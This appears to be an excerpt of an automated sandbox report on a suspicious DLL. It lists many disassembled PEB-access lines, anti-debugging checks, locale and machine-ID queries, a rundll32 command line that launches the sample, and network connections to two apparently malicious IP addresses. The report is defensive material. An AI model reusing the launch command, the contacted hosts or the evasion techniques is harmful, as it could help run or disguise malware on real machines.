Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_7EDBE090 mov edx, dword ptr fs:[00000030h]		13_2_7EDBE090
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7F79EF70 mov eax, dword ptr fs:[00000030h]		18_2_7F79EF70
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7F7A5F40 mov edx, dword ptr fs:[00000030h]		18_2_7F7A5F40
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7F7A5F40 mov eax, dword ptr fs:[00000030h]		18_2_7F7A5F40
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7F7C7F30 mov ecx, dword ptr fs:[00000030h]		18_2_7F7C7F30
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7F7C7F30 mov eax, dword ptr fs:[00000030h]		18_2_7F7C7F30
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7F7C7F30 mov ecx, dword ptr fs:[00000030h]		18_2_7F7C7F30
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7F7B0FF0 mov edx, dword ptr fs:[00000030h]		18_2_7F7B0FF0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7F7B0FF0 mov ecx, dword ptr fs:[00000030h]		18_2_7F7B0FF0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7F7B0FF0 mov eax, dword ptr fs:[00000030h]		18_2_7F7B0FF0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7F7B0FF0 mov eax, dword ptr fs:[00000030h]		18_2_7F7B0FF0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7F7B0FF0 mov eax, dword ptr fs:[00000030h]		18_2_7F7B0FF0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7F7B0FF0 mov eax, dword ptr fs:[00000030h]		18_2_7F7B0FF0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7F7B0FF0 mov eax, dword ptr fs:[00000030h]		18_2_7F7B0FF0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7F7B0FF0 mov edx, dword ptr fs:[00000030h]		18_2_7F7B0FF0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7F7B0FF0 mov eax, dword ptr fs:[00000030h]		18_2_7F7B0FF0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7F793FF4 mov edx, dword ptr fs:[00000030h]		18_2_7F793FF4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7F793FF4 mov ecx, dword ptr fs:[00000030h]		18_2_7F793FF4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7F796FE0 mov edx, dword ptr fs:[00000030h]		18_2_7F796FE0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7F793F90 mov edx, dword ptr fs:[00000030h]		18_2_7F793F90
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7F793F90 mov ecx, dword ptr fs:[00000030h]		18_2_7F793F90
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7F793F90 mov ecx, dword ptr fs:[00000030h]		18_2_7F793F90
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7F793F90 mov ecx, dword ptr fs:[00000030h]		18_2_7F793F90
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7F793F90 mov ecx, dword ptr fs:[00000030h]		18_2_7F793F90
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7F793F90 mov edx, dword ptr fs:[00000030h]		18_2_7F793F90
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7F7F9E7B mov eax, dword ptr fs:[00000030h]		18_2_7F7F9E7B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7F7F9E4A mov eax, dword ptr fs:[00000030h]		18_2_7F7F9E4A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7F7F9E06 mov eax, dword ptr fs:[00000030h]		18_2_7F7F9E06
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7F7CBD70 mov eax, dword ptr fs:[00000030h]		18_2_7F7CBD70
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7F7BAD50 mov ecx, dword ptr fs:[00000030h]		18_2_7F7BAD50
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7F7B6D40 mov eax, dword ptr fs:[00000030h]		18_2_7F7B6D40
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7F7B6D40 mov edx, dword ptr fs:[00000030h]		18_2_7F7B6D40
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7F7B6D40 mov eax, dword ptr fs:[00000030h]		18_2_7F7B6D40
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7F7B6D40 mov eax, dword ptr fs:[00000030h]		18_2_7F7B6D40
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7F7B6D40 mov eax, dword ptr fs:[00000030h]		18_2_7F7B6D40
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7F7B6D40 mov eax, dword ptr fs:[00000030h]		18_2_7F7B6D40
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7F7B6D40 mov eax, dword ptr fs:[00000030h]		18_2_7F7B6D40
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7F7B6D40 mov ecx, dword ptr fs:[00000030h]		18_2_7F7B6D40
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7F7B6D40 mov edx, dword ptr fs:[00000030h]		18_2_7F7B6D40
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7F7B6D40 mov eax, dword ptr fs:[00000030h]		18_2_7F7B6D40
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7F7CADB0 mov ecx, dword ptr fs:[00000030h]		18_2_7F7CADB0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7F7CADB0 mov eax, dword ptr fs:[00000030h]		18_2_7F7CADB0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7F7CADB0 mov ecx, dword ptr fs:[00000030h]		18_2_7F7CADB0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7F7CADB0 mov edx, dword ptr fs:[00000030h]		18_2_7F7CADB0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7F7CADB0 mov eax, dword ptr fs:[00000030h]		18_2_7F7CADB0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7F7F2C38 mov ecx, dword ptr fs:[00000030h]		18_2_7F7F2C38
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7F7C8C30 mov ecx, dword ptr fs:[00000030h]		18_2_7F7C8C30
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7F7C8C30 mov eax, dword ptr fs:[00000030h]		18_2_7F7C8C30
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7F7C8C30 mov edx, dword ptr fs:[00000030h]		18_2_7F7C8C30
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7F7C8C30 mov eax, dword ptr fs:[00000030h]		18_2_7F7C8C30
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7F7C8C30 mov ecx, dword ptr fs:[00000030h]		18_2_7F7C8C30
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7F796C2A mov eax, dword ptr fs:[00000030h]		18_2_7F796C2A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7F7C9B40 mov eax, dword ptr fs:[00000030h]		18_2_7F7C9B40
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7F796B90 mov eax, dword ptr fs:[00000030h]		18_2_7F796B90
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7F7CBB90 mov edx, dword ptr fs:[00000030h]		18_2_7F7CBB90
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7F7CBB80 mov eax, dword ptr fs:[00000030h]		18_2_7F7CBB80
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7F7E1A50 mov eax, dword ptr fs:[00000030h]		18_2_7F7E1A50
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7F7AAAE0 mov ecx, dword ptr fs:[00000030h]		18_2_7F7AAAE0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7F7C8930 mov eax, dword ptr fs:[00000030h]		18_2_7F7C8930
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7F796980 mov edx, dword ptr fs:[00000030h]		18_2_7F796980
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7F7D5760 mov ecx, dword ptr fs:[00000030h]		18_2_7F7D5760
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7F7D5760 mov edx, dword ptr fs:[00000030h]		18_2_7F7D5760
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7F7D5760 mov eax, dword ptr fs:[00000030h]		18_2_7F7D5760
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7F7D5760 mov ecx, dword ptr fs:[00000030h]		18_2_7F7D5760
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7F7C8780 mov edx, dword ptr fs:[00000030h]		18_2_7F7C8780
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7F7AF690 mov ecx, dword ptr fs:[00000030h]		18_2_7F7AF690
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7F7AF690 mov ecx, dword ptr fs:[00000030h]		18_2_7F7AF690
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7F7AF690 mov eax, dword ptr fs:[00000030h]		18_2_7F7AF690
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7F7AF690 mov eax, dword ptr fs:[00000030h]		18_2_7F7AF690
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7F7AF690 mov eax, dword ptr fs:[00000030h]		18_2_7F7AF690
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7F7AF690 mov eax, dword ptr fs:[00000030h]		18_2_7F7AF690
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7F7AF690 mov eax, dword ptr fs:[00000030h]		18_2_7F7AF690
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7F7AF690 mov eax, dword ptr fs:[00000030h]		18_2_7F7AF690
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7F7AF690 mov eax, dword ptr fs:[00000030h]		18_2_7F7AF690
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7F7A6540 mov eax, dword ptr fs:[00000030h]		18_2_7F7A6540
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7F7CE5D0 mov ecx, dword ptr fs:[00000030h]		18_2_7F7CE5D0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7F7C7460 mov eax, dword ptr fs:[00000030h]		18_2_7F7C7460
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7F798440 mov edx, dword ptr fs:[00000030h]		18_2_7F798440
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7F798440 mov ecx, dword ptr fs:[00000030h]		18_2_7F798440
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7F798440 mov ecx, dword ptr fs:[00000030h]		18_2_7F798440
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7F7BC4F0 mov ecx, dword ptr fs:[00000030h]		18_2_7F7BC4F0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7F7944E4 mov ecx, dword ptr fs:[00000030h]		18_2_7F7944E4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7F7944E4 mov ecx, dword ptr fs:[00000030h]		18_2_7F7944E4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7F7944E4 mov edx, dword ptr fs:[00000030h]		18_2_7F7944E4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7F7D6240 mov ecx, dword ptr fs:[00000030h]		18_2_7F7D6240
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7F7D6240 mov edx, dword ptr fs:[00000030h]		18_2_7F7D6240
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7F7D6240 mov eax, dword ptr fs:[00000030h]		18_2_7F7D6240
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7F7D6240 mov ecx, dword ptr fs:[00000030h]		18_2_7F7D6240
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7F7CC060 mov ecx, dword ptr fs:[00000030h]		18_2_7F7CC060
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 36_2_6B4FD480 mov eax, dword ptr fs:[00000030h]		36_2_6B4FD480
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 36_2_7F107F30 mov ecx, dword ptr fs:[00000030h]		36_2_7F107F30
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 36_2_7F107F30 mov eax, dword ptr fs:[00000030h]		36_2_7F107F30
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 36_2_7F107F30 mov ecx, dword ptr fs:[00000030h]		36_2_7F107F30
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 36_2_7F0E5F40 mov edx, dword ptr fs:[00000030h]		36_2_7F0E5F40
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 36_2_7F0E5F40 mov eax, dword ptr fs:[00000030h]		36_2_7F0E5F40
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 36_2_7F115760 mov ecx, dword ptr fs:[00000030h]		36_2_7F115760
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 36_2_7F115760 mov edx, dword ptr fs:[00000030h]		36_2_7F115760
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 36_2_7F115760 mov eax, dword ptr fs:[00000030h]		36_2_7F115760
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 36_2_7F115760 mov ecx, dword ptr fs:[00000030h]		36_2_7F115760
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 36_2_7F0DEF70 mov eax, dword ptr fs:[00000030h]		36_2_7F0DEF70
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 36_2_7F108780 mov edx, dword ptr fs:[00000030h]		36_2_7F108780
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 36_2_7F0D3F90 mov edx, dword ptr fs:[00000030h]		36_2_7F0D3F90
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 36_2_7F0D3F90 mov ecx, dword ptr fs:[00000030h]		36_2_7F0D3F90
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 36_2_7F0D3F90 mov ecx, dword ptr fs:[00000030h]		36_2_7F0D3F90
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 36_2_7F0D3F90 mov ecx, dword ptr fs:[00000030h]		36_2_7F0D3F90
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 36_2_7F0D3F90 mov ecx, dword ptr fs:[00000030h]		36_2_7F0D3F90
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 36_2_7F0D3F90 mov edx, dword ptr fs:[00000030h]		36_2_7F0D3F90
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 36_2_7F0D6FE0 mov edx, dword ptr fs:[00000030h]		36_2_7F0D6FE0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 36_2_7F0D3FF4 mov edx, dword ptr fs:[00000030h]		36_2_7F0D3FF4
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 36_2_7F0D3FF4 mov ecx, dword ptr fs:[00000030h]		36_2_7F0D3FF4
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 36_2_7F0F0FF0 mov edx, dword ptr fs:[00000030h]		36_2_7F0F0FF0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 36_2_7F0F0FF0 mov ecx, dword ptr fs:[00000030h]		36_2_7F0F0FF0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 36_2_7F0F0FF0 mov eax, dword ptr fs:[00000030h]		36_2_7F0F0FF0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 36_2_7F0F0FF0 mov eax, dword ptr fs:[00000030h]		36_2_7F0F0FF0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 36_2_7F0F0FF0 mov eax, dword ptr fs:[00000030h]		36_2_7F0F0FF0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 36_2_7F0F0FF0 mov eax, dword ptr fs:[00000030h]		36_2_7F0F0FF0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 36_2_7F0F0FF0 mov eax, dword ptr fs:[00000030h]		36_2_7F0F0FF0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 36_2_7F0F0FF0 mov edx, dword ptr fs:[00000030h]		36_2_7F0F0FF0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 36_2_7F0F0FF0 mov eax, dword ptr fs:[00000030h]		36_2_7F0F0FF0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 36_2_7F139E06 mov eax, dword ptr fs:[00000030h]		36_2_7F139E06
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 36_2_7F139E7B mov eax, dword ptr fs:[00000030h]		36_2_7F139E7B
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 36_2_7F0EF690 mov ecx, dword ptr fs:[00000030h]		36_2_7F0EF690
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 36_2_7F0EF690 mov ecx, dword ptr fs:[00000030h]		36_2_7F0EF690
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 36_2_7F0EF690 mov eax, dword ptr fs:[00000030h]		36_2_7F0EF690
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 36_2_7F0EF690 mov eax, dword ptr fs:[00000030h]		36_2_7F0EF690
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 36_2_7F0EF690 mov eax, dword ptr fs:[00000030h]		36_2_7F0EF690
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 36_2_7F0EF690 mov eax, dword ptr fs:[00000030h]		36_2_7F0EF690
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 36_2_7F0EF690 mov eax, dword ptr fs:[00000030h]		36_2_7F0EF690
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 36_2_7F0EF690 mov eax, dword ptr fs:[00000030h]		36_2_7F0EF690
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 36_2_7F0EF690 mov eax, dword ptr fs:[00000030h]		36_2_7F0EF690
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 36_2_7F0E6540 mov eax, dword ptr fs:[00000030h]		36_2_7F0E6540
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 36_2_7F0F6D40 mov eax, dword ptr fs:[00000030h]		36_2_7F0F6D40
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 36_2_7F0F6D40 mov edx, dword ptr fs:[00000030h]		36_2_7F0F6D40
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 36_2_7F0F6D40 mov eax, dword ptr fs:[00000030h]		36_2_7F0F6D40
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 36_2_7F0F6D40 mov eax, dword ptr fs:[00000030h]		36_2_7F0F6D40
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 36_2_7F0F6D40 mov eax, dword ptr fs:[00000030h]		36_2_7F0F6D40
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 36_2_7F0F6D40 mov eax, dword ptr fs:[00000030h]		36_2_7F0F6D40
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 36_2_7F0F6D40 mov eax, dword ptr fs:[00000030h]		36_2_7F0F6D40
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 36_2_7F0F6D40 mov ecx, dword ptr fs:[00000030h]		36_2_7F0F6D40
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 36_2_7F0F6D40 mov edx, dword ptr fs:[00000030h]		36_2_7F0F6D40
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 36_2_7F0F6D40 mov eax, dword ptr fs:[00000030h]		36_2_7F0F6D40
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 36_2_7F0FAD50 mov ecx, dword ptr fs:[00000030h]		36_2_7F0FAD50
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 36_2_7F10BD70 mov eax, dword ptr fs:[00000030h]		36_2_7F10BD70
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 36_2_7F10ADB0 mov ecx, dword ptr fs:[00000030h]		36_2_7F10ADB0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 36_2_7F10ADB0 mov eax, dword ptr fs:[00000030h]		36_2_7F10ADB0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 36_2_7F10ADB0 mov ecx, dword ptr fs:[00000030h]		36_2_7F10ADB0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 36_2_7F10ADB0 mov edx, dword ptr fs:[00000030h]		36_2_7F10ADB0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 36_2_7F10ADB0 mov eax, dword ptr fs:[00000030h]		36_2_7F10ADB0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 36_2_7F10E5D0 mov ecx, dword ptr fs:[00000030h]		36_2_7F10E5D0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 36_2_7F108C30 mov ecx, dword ptr fs:[00000030h]		36_2_7F108C30
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 36_2_7F108C30 mov eax, dword ptr fs:[00000030h]		36_2_7F108C30
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 36_2_7F108C30 mov edx, dword ptr fs:[00000030h]		36_2_7F108C30
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 36_2_7F108C30 mov eax, dword ptr fs:[00000030h]		36_2_7F108C30
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 36_2_7F108C30 mov ecx, dword ptr fs:[00000030h]		36_2_7F108C30
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 36_2_7F0D6C2A mov eax, dword ptr fs:[00000030h]		36_2_7F0D6C2A
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 36_2_7F0D8440 mov edx, dword ptr fs:[00000030h]		36_2_7F0D8440
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 36_2_7F0D8440 mov ecx, dword ptr fs:[00000030h]		36_2_7F0D8440
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 36_2_7F0D8440 mov ecx, dword ptr fs:[00000030h]		36_2_7F0D8440
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 36_2_7F107460 mov eax, dword ptr fs:[00000030h]		36_2_7F107460
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 36_2_7F0D44E4 mov ecx, dword ptr fs:[00000030h]		36_2_7F0D44E4
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 36_2_7F0D44E4 mov ecx, dword ptr fs:[00000030h]		36_2_7F0D44E4
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 36_2_7F0D44E4 mov edx, dword ptr fs:[00000030h]		36_2_7F0D44E4
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 36_2_7F0FC4F0 mov ecx, dword ptr fs:[00000030h]		36_2_7F0FC4F0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 36_2_7F109B40 mov eax, dword ptr fs:[00000030h]		36_2_7F109B40
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 36_2_7F10BB90 mov edx, dword ptr fs:[00000030h]		36_2_7F10BB90
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 36_2_7F10BB80 mov eax, dword ptr fs:[00000030h]		36_2_7F10BB80
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 36_2_7F0D6B90 mov eax, dword ptr fs:[00000030h]		36_2_7F0D6B90
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 36_2_7F121A50 mov eax, dword ptr fs:[00000030h]		36_2_7F121A50
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 36_2_7F116240 mov ecx, dword ptr fs:[00000030h]		36_2_7F116240
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 36_2_7F116240 mov edx, dword ptr fs:[00000030h]		36_2_7F116240
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 36_2_7F116240 mov eax, dword ptr fs:[00000030h]		36_2_7F116240
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 36_2_7F116240 mov ecx, dword ptr fs:[00000030h]		36_2_7F116240
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 36_2_7F0EAAE0 mov ecx, dword ptr fs:[00000030h]		36_2_7F0EAAE0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 36_2_7F108930 mov eax, dword ptr fs:[00000030h]		36_2_7F108930
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 36_2_7F0D6980 mov edx, dword ptr fs:[00000030h]		36_2_7F0D6980
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 36_2_7F10C060 mov ecx, dword ptr fs:[00000030h]		36_2_7F10C060

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 13_2_7EDB6280 GetProcessHeap,HeapAlloc,GetProcessHeap,HeapReAlloc,

13_2_7EDB6280

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_6CF92EFD SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,		13_2_6CF92EFD
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_7EE03887 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,		13_2_7EE03887
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_7EE07713 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,		13_2_7EE07713
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7F7E3AD5 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,		18_2_7F7E3AD5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7F7E3887 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,		18_2_7F7E3887
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7F7E7713 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,		18_2_7F7E7713
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 36_2_6B542EFD SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,		36_2_6B542EFD
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 36_2_7F127713 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,		36_2_7F127713
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 36_2_7F123AD5 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,		36_2_7F123AD5
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 36_2_7F123887 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,		36_2_7F123887

HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\SysWOW64\regsvr32.exe	Network Connect: 194.67.193.12 443
Source: C:\Windows\SysWOW64\rundll32.exe	Network Connect: 194.67.193.13 443			Jump to behavior

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\useraccount.aspx.dll",#1

Jump to behavior

Language, Device and Operating System Detection

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 13_2_7EE0363C cpuid

13_2_7EE0363C

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,		13_2_7EE1CEEA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: EnumSystemLocalesW,		13_2_7EE1CAE3
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: EnumSystemLocalesW,		13_2_7EE1CA48
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetLocaleInfoW,		13_2_7EE1681C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: EnumSystemLocalesW,		13_2_7EE1C9FD
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetACP,IsValidCodePage,GetLocaleInfoW,		13_2_7EE1C75B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: EnumSystemLocalesW,		13_2_7EE1629F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,		13_2_7EE1D0BF

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 18_2_7F7F0FF4 GetSystemTimeAsFileTime,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,

18_2_7F7F0FF4

Source: C:\Windows\SysWOW64\regsvr32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

